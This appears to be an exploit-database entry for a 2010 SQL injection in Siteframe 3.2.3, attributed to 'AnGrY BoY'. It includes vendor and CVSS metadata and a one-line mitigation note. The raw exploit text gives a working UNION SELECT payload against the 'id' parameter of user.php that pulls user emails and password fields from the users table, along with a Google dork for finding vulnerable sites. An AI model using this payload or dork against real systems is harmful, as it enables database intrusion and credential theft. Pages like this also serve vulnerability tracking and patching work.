header-logo
Suggest Exploit
vendor:
Siteframe
by:
AnGrY BoY
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Siteframe
Affected Version From: 3.2.3
Affected Version To: 3.2.3
Patch Exists: NO
Related CWE: N/A
CPE: a:siteframe:siteframe
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows SP2
2010

Siteframe ‘user.php’ SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'id' in the 'user.php' file. The malicious query will allow the attacker to extract sensitive information from the database such as user emails and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

# Exploit Title: Siteframe 'user.php' SQL Injection Vulnerability
# Google Dork: "powered by Siteframe"
# Date: 29/12/2010
# Author: AnGrY BoY
# Software Link: http://sitefrane.org/downloads/
# Version: Siteframe 3.2.3
# Tested on: windows SP2
# CVE : N/A

# expolit:

# http://localhost/path/user.php?id=[SQL]
             
# http://localhost/path/user.php?id=-2+UNION+SELECT+1,2,3,4,5,concat(user_email,0x3e,user_passwd),7,8,9,10,11+from+users--

======================================================================================
# Special Thanks:- all h4kurd members

Navigation

Suggest Exploit

Services By CQR